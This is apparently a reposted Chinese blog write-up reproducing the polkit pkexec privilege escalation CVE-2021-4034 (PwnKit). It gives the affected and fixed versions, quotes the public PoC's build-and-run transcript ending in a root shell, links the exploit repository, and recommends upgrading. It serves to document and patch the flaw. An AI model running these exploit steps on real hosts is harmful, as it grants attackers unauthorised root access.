【漏洞復現】Linux Polkit本地權限提升漏洞(CVE-2021-4034)


0x00 漏洞描述

Polkit 是用於在類 Unix 操作系統中控制系統范圍特權的組件。它為非特權進程提供了與特權進程進行通信的有組織的方式。

CVE-2021-4034

polkit 的 pkexec 存在本地權限提升漏洞,已獲得普通權限的攻擊者可通過此漏洞獲取root權限。

該漏洞CVSS評分:7.8,危害等級:高危

漏洞利用難度低,最早引入問題的 commit 來自 2009 年,影響版本范圍遠超去年的 sudo 漏洞。

漏洞作者在 Ubuntu、Debian、Fedora 和 CentOS 的默認安裝環境上均測試通過。

0x01 影響范圍:

影響版本:由於 polkit 為系統預裝工具,目前主流Linux版本均受影響。

修復版本:

CentOS系列:
CentOS 6:polkit-0.96-11.el6_10.2
CentOS 7:polkit-0.112-26.el7_9.1
CentOS 8.0:polkit-0.115-13.el8_5.1
CentOS 8.2:polkit-0.115-11.el8_2.2
CentOS 8.4:polkit-0.115-11.el8_4.2

Ubuntu系列:
Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2
Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6
Ubuntu 16.04 ESM:policykit-1 - 0.105-14.1ubuntu0.5+esm1
Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1

0x02 漏洞復現

README:

If the exploit is working you'll get a root shell immediately:

vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

本地復現環境ubuntu:

普通用戶(adminxe)

使用POC進行權限提升:

命令:

1、make
2、./cve-2021-4034

成功進行提權:

0x03 POC地址:

https://github.com/berdav/CVE-2021-4034

0x04 修復建議

參考漏洞影響范圍,及時升級至最新安全版本。

0x05 參考

[1] https://ubuntu.com/security/CVE-2021-4034

[2] https://access.redhat.com/security/cve/CVE-2021-4034

[3] https://www.linux.org/forums/linux-security-announcements-automated.14/

[4] https://nosec.org/home/detail/4959.html

轉載請注明:Adminxe's Blog » 【漏洞復現】Linux Polkit本地權限提升漏洞(CVE-2021-4034)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM